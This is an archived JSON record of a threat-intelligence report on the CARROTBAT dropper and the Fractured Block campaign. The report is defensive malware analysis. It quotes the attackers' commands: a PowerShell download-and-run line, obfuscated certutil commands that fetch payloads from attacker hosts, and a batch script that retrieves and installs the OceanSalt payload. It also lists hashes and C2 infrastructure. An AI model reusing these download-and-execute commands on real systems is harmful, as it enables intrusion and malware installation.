{
	"id": "44d34ee1-f17c-4fbd-a34e-339406e60ad4",
	"created_at": "2026-04-06T00:21:07.965214Z",
	"updated_at": "2026-04-10T03:38:09.783149Z",
	"deleted_at": null,
	"sha1_hash": "63f15b7536e3b4631b02bb9807e21f9e22190c9f",
	"title": "The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4481362,
	"plain_text": "The Fractured Block Campaign: CARROTBAT Used to Deliver\r\nMalware Targeting Southeast Asia\r\nBy Josh Grunzweig, Kyle Wilhoit\r\nPublished: 2018-11-29 · Archived: 2026-04-05 16:16:08 UTC\r\nUnit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to\r\ndeliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series\r\nof subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events. Based on various\r\ninformation witnessed within this dropper, Unit 42 has dubbed this malware family CARROTBAT.\r\nCARROTBAT was initially discovered in an attack in December 2017. This attack was made against a British\r\ngovernment agency using the SYSCON malware family. SYSCON is a simple remote access Trojan (RAT) that\r\nuses the file transfer protocol (FTP) for network communications. While there is no evidence that this attack\r\nagainst a British government agency made use of the CARROTBAT dropper, we found overlaps within this\r\nattack’s infrastructure that ultimately led us to CARROTBAT’s initial discovery, as well as other ties between\r\nthese two malware families.\r\nIn total, 29 unique CARROTBAT samples have been identified to date, containing a total of 12 confirmed unique\r\ndecoy documents. These samples began appearing in March of this year, with the majority of activity taking place\r\nwithin the past 3 months. The payloads vary, as earlier instances delivered SYSCON, while newer instances are\r\ndelivering the previously reported OceanSalt malware family. CARROTBAT and its associated payloads\r\nconstitute a campaign that we are dubbing ‘Fractured Block’.\r\nInitial Attack\r\nOn December 13, 2017, a spear phishing email was sent from the email address of yuri.sidorav@yandex[.]ru to a\r\nhigh ranking individual within a British government agency. 
This email contained the following subject, with an\r\nattached document file of the same name:\r\nUS. would talk with North Korea “without precondition”\r\nWithin this attached Word document, the following text is displayed:\r\nU.S. would talk with North Korea “without precondition”: Tillerson, By Seungmock Oh\r\nThis text references an article that was published on the same day as the attack by NKNews[.]org. The article in\r\nquestion discusses diplomatic ties between the United States and North Korea.\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 1 of 17\n\nFigure 1 Article referenced by decoy document in attack against British government agency\r\nThe attached document leverages a DDE exploit to ultimately execute the following code:\r\nc:\\\\windows\\\\system32\\\\cmd.exe \"/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -\r\nnoprofile -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc',\r\n'%TEMP%\\\\AAA.exe');Start-Process('%TEMP%\\\\AAA.exe')\r\nPalo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it.\r\nThe command run by this particular malware sample attempts to download a remote executable file named\r\n0_31.doc, which in turn is placed within the victim’s %TEMP% directory with the filename of AAA.exe prior to\r\nbeing executed.\r\nThe payload in question belongs to the SYSCON malware family. 
It communicates with ftp.bytehost31[.]org via\r\nFTP for command and control (C2).\r\nFigure 2 SYSCON network traffic witnessed during execution\r\nPivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional\r\nsamples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the\r\nCARROTBAT malware family. Pivoting further on characteristics belonging to CARROTBAT ultimately led to\r\nthe identification of 29 unique samples in this malware family.\r\nFractured Block Campaign\r\nThe campaign dubbed Fractured Block encompasses all CARROTBAT samples identified to date. CARROTBAT\r\nitself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a\r\ncommand that will download and run a payload on the targeted machine. In total, the following 11 decoy\r\ndocument file formats are supported by this malware:\r\n.doc\r\n.docx\r\n.eml\r\n.hwp\r\n.jpg\r\n.pdf\r\n.png\r\n.ppt\r\n.pptx\r\n.xls\r\n.xlsx\r\nAfter the embedded decoy document is opened, an obfuscated command such as the following is executed on the\r\nsystem:\r\nC: \u0026\u0026 cd %TEMP% \u0026\u0026 c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt \u0026\u0026 ren\r\n1.txt 1.bat \u0026\u0026 1.bat \u0026\u0026 exit\r\nThis command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil\r\nutility. More information on this technique and the CARROTBAT malware family may be found within the\r\nAppendix.\r\nThe 29 unique CARROTBAT malware samples have compile timestamps between March 2018 and September\r\n2018. 
Of these 29 unique samples, 11 unique decoy documents were leveraged in attacks, as seen in the figure\r\nbelow:\r\nFigure 3 Timeline of decoy documents being dropped by CARROTBAT\r\nA majority of the decoy documents targeting victims in Korea had subject matter related to cryptocurrencies. In\r\none unique case, the decoy contains a business card belonging to an individual working at COINVIL, which is an\r\norganization that announced plans to build a cryptocurrency exchange in the Philippines in May 2018.\r\nAdditional lure subjects included timely political events, such as relations between the U.S. and North Korea, as\r\nwell as a trip by U.S. President Donald Trump to a summit in Singapore.\r\nPayloads for the CARROTBAT samples varied. Originally, between March 2018 and July 2018,\r\nmultiple instances of the SYSCON malware family were observed. These samples communicated with the\r\nfollowing hosts via FTP for C2 communication:\r\nftp.byethost7[.]com\r\nftp.byethost10[.]com\r\nfiles.000webhost[.]com\r\nBeginning in June 2018, we observed the OceanSalt malware family being dropped by CARROTBAT. These\r\nsamples continue to be used at the time of this writing, and were observed communicating with the following host\r\nfor C2 communication:\r\n61.14.210[.]72:7117\r\nInteresting Ties with Other Threat Activity\r\nAs stated earlier within this blog, there is infrastructure overlap between the CARROTBAT and KONNI malware\r\nfamilies. KONNI is a RAT that is believed to have been in use for over four years, with a wide array of\r\nfunctionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure. 
This\r\nparticular malware family has yet to be attributed to a named group at the time of this writing. However, targeting\r\nhas historically focused on the Southeast Asia region.\r\nAnother relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular\r\nmalware family was first reported in October 2017 and has been observed delivering decoy documents pertaining\r\nto North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2\r\ncommunication.\r\nBelow you can see the KONNI usage highlighted in the gold flags and SYSCON highlighted in the purple flags.\r\nFigure 4 Maltego diagram correlating malicious activity\r\nFinally, the third overlap is the OceanSalt malware payload. First reported by McAfee in October 2018, reported\r\nvictims include South Korea, the United States, and Canada. Like the samples outlined in the McAfee report, the\r\nOceanSalt samples observed in the Fractured Block Campaign employed the same code similarities as those of\r\nComment Crew (aka APT1); however, we believe that these code similarities are a false flag. The malware used\r\nby Comment Crew has been in circulation for many years, and we do not believe the activity outlined in this blog\r\npost has any overlap with the older Comment Crew activity.\r\nFigure 5 Threat activity overlap over time\r\nConclusion\r\nFinding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using\r\nCARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity. 
The various overlaps\r\nencountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor.\r\nHowever, we do not believe there to be enough evidence at this time to make this claim with complete certainty.\r\nThe CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy\r\ndocuments, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated.\r\nWhile the actors behind Fractured Block remain active,\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nAutoFocus customers can track these samples with the FracturedBlock, SYSCON, KONNI, and\r\nCARROTBAT\r\nWildFire detects all files mentioned in this report with malicious verdicts.\r\nTraps blocks all of the files currently associated with the Fractured Block campaign.\r\nA special thanks to Chronicle's VirusTotal team for their assistance researching this threat.\r\nAppendix\r\nCARROTBAT Technical Analysis\r\nFor the analysis below, the following sample is used:\r\nMD5 3e4015366126dcdbdcc8b5c508a6d25c\r\nSHA1 f459f9cfbd10b136cafb19cbc233a4c8342ad984\r\nSHA256 aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de\r\nFile Type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompile Timestamp 2018-09-05 00:17:22 UTC\r\nUpon execution, the malware will read the last 8 bytes of itself. These bytes include two DWORDs that contain\r\nboth the length of the embedded decoy document, as well as the type of file it is.\r\nFigure 6 End of CARROTBAT file containing decoy document information\r\nUsing this gathered information, CARROTBAT continues to read the end of itself, minus the previously retrieved\r\n8 bytes. 
This data contains the entirety of the embedded decoy document and is written to the same directory and\r\nfilename as the original malware sample. However, the file extension is changed based on the previously retrieved\r\nfile type value. The following corresponding values are used by CARROTBAT:\r\nValue Document Extension\r\n0x0 .doc\r\n0x1 .pdf\r\n0x2 .jpg\r\n0x3 .xls\r\n0x4 .xlsx\r\n0x5 .hwp\r\n0x6 .docx\r\n0x7 .png\r\n0x8 .eml\r\n0x9 .ppt\r\n0xA .pptx\r\nIn this particular case, the .hwp file extension is used for the decoy document. After the decoy is dropped to disk,\r\nit is opened in a new process. In this instance, the whitepaper for the BKN Bank cryptocurrency exchange is\r\ndisplayed to the victim:\r\nFigure 7 HWP decoy document displayed to victim\r\nAfter this document is displayed, the malware will continue to execute the following command in a new process:\r\nC: \u0026\u0026 cd %TEMP% \u0026\u0026 c^e^r^tutil -urlca^che -spl^it -f http://s8877.1apps[.]com/vip/1.txt \u0026\u0026 ren 1.txt\r\n1.bat \u0026\u0026 1.bat \u0026\u0026 exit\r\nThis command will download a remote file using the built-in Microsoft Windows certutil command. 
In this\r\nparticular instance, the following script is retrieved:\r\n@echo off\r\n:if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS)\r\n:32BITOS\r\ncertutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt \u003e nul\r\ncertutil -decode -f setup.txt setup.cab \u003e nul\r\ndel /f /q setup.txt \u003e nul\r\nGOTO ISEXIST\r\n:64BITOS\r\n:certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt \u003e nul\r\n:certutil -d^ecode -f setup2.txt setup.cab \u003e nul\r\n:del /f /q setup2.txt \u003e nul\r\n:GOTO ISEXIST\r\n:ISEXIST\r\nif exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT)\r\n:EXECUTE\r\nver | findstr /i \"10\\.\" \u003e nul\r\nIF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS)\r\n:WIN10\r\nexpand %TEMP%\\setup.cab -F:* %CD% \u003e nul\r\n:if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32\r\n%TEMP%\\drv.dll EntryPoint)\r\n%TEMP%\\install.bat\r\nGOTO EXIT\r\n:OTHEROS\r\nwusa %TEMP%\\setup.cab /quiet /extract:%TEMP% \u003e nul\r\n%TEMP%\\install.bat\r\nGOTO EXIT\r\n:EXIT\r\ndel /f /q setup.cab \u003e nul\r\ndel /f /q %~dpnx0 \u003e nul\r\nThis script simply checks the operating system of the victim and downloads the respective payload again using the\r\ncertutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The\r\npayload in question is a CAB file that is then unpacked. 
Finally, the malware executes the extracted install.bat\r\nscript before deleting the original files and exiting.\r\nFigure 8 CARROTBAT downloading final payload via certutil\r\nThe downloaded CAB file has the following properties:\r\nMD5 a943e196b83c4acd9c5ce13e4c43b4f4\r\nSHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd\r\nSHA256 cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62\r\nFile Type Microsoft Cabinet archive data, 181248 bytes, 3 files\r\nThe following three files and their descriptions are dropped by this CAB file:\r\nFilename Purpose\r\nInstall.bat\r\nInstallation batch script responsible for copying the other files to\r\nC:\\Users\\Public\\Downloads and setting the Run registry key to ensure persistence. It will\r\nalso remove any original files before exiting.\r\nDrvUpdate.dll Instance of the OceanSalt malware family.\r\nwinnet.ini Encoded C2 information.\r\nThe C2 information is stored via the external winnet.ini file and is encoded using an incremental XOR key. 
The\r\nfollowing function written in Python may be used to decode this file:\r\ndef decode(data):\r\n    # data: contents of winnet.ini as a str (read in text mode, e.g. with encoding='latin-1')\r\n    out = \"\"\r\n    c = 0\r\n    for d in data:\r\n        # XOR each byte with its offset, so the key is 0, 1, 2, ... (incremental)\r\n        out += chr(ord(d) ^ c)\r\n        c += 1\r\n    return out\r\nOnce decoded it is discovered that this instance of OceanSalt attempts to communicate with 61.14.210[.]72 on\r\nport 7117.\r\nCARROTBAT Samples\r\nd34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d\r\n8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa\r\n26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847\r\ne218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828\r\n824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3\r\n70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22\r\n87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc\r\nac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f\r\n
d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0\r\n7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae\r\n1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0\r\n337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b\r\n92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef\r\n42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded\r\nba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb\r\ndca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea\r\n7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97\r\n3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b96\r\naef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de\r\n2547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48\r\n6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a\r\n22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10\r\n3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd\r\nba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a\r\ne527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828\r\n9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9\r\nffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e\r\ne3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd\r\na0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc\r\nSYSCON Payload Samples\r\n5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b\r\nfceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659\r\nfa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5\r\nda94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652\r\n
2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27\r\n62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7\r\nf27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4\r\n0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358\r\nf4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084\r\ne8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc\r\n1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968\r\n2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48\r\n5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf\r\n0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b\r\nOceanSalt Payload Samples\r\n59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005\r\n7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6\r\nfe8d65287dd40ca0a1fadddc4268268b4a77cdb04a490c1a73aa15b6e4f1dd63\r\na23f95b4a602bdaef1b58e97843e2f38218554eb57397210a1aaa68508843bd0\r\n59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005\r\ncfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62\r\n7ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2\r\n3663e7b197efe91fb7879a56c29fb8ed196815e0145436ee2fad5825c29de897\r\n59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005\r\n7ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2\r\ncf31dac47680ff1375ddaa3720892ed3a7a70d1872ee46e6366e6f93123f58d2\r\nfe186d04ca6afec2578386b971b5ecb189d8381be055790a9e6f78b3f23c9958\r\nInfrastructure\r\nhttps://881.000webhostapp[.]com/1.txt\r\nhttp://attach10132.1apps[.]com/1.txt\r\n
https://071790.000webhostapp[.]com/1.txt\r\nhttps://vnik.000webhostapp[.]com/1.txt\r\nhttps://7077.000webhostapp[.]com/vic/1.txt\r\nhttp://a7788.1apps[.]com/att/1.txt\r\nhttp://s8877.1apps[.]com/vip/1.txt\r\nhttp://hanbosston.000webhostapp[.]com/1.txt\r\nhttp://bluemountain.1apps[.]com/1.txt\r\nhttps://www.webmail-koryogroup[.]com/keep/1.txt\r\nhttp://filer1.1apps[.]com/1.txt\r\nftp.byethost7[.]com\r\nftp.byethost10[.]com\r\nfiles.000webhost[.]com\r\nwebhost[.]com\r\n61.14.210[.]72:7117\r\nSource: https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/"
	],
	"report_names": [
		"unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-10T02:00:03.659118Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "dabb6779-f72e-40ca-90b7-1810ef08654d",
			"created_at": "2022-10-25T15:50:23.463113Z",
			"updated_at": "2026-04-10T02:00:05.369301Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"APT1",
				"Comment Crew",
				"Comment Group",
				"Comment Panda"
			],
			"source_name": "MITRE:APT1",
			"tools": [
				"Seasalt",
				"ipconfig",
				"Cachedump",
				"PsExec",
				"GLOOXMAIL",
				"Lslsass",
				"PoisonIvy",
				"WEBC2",
				"Mimikatz",
				"gsecdump",
				"Pass-The-Hash Toolkit",
				"Tasklist",
				"xCmd",
				"pwdump"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-10T02:00:03.545252Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"Konni",
				"Vedalia",
				"OSMIUM"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434867,
	"ts_updated_at": 1775792289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63f15b7536e3b4631b02bb9807e21f9e22190c9f.pdf",
		"text": "https://archive.orkl.eu/63f15b7536e3b4631b02bb9807e21f9e22190c9f.txt",
		"img": "https://archive.orkl.eu/63f15b7536e3b4631b02bb9807e21f9e22190c9f.jpg"
	}
}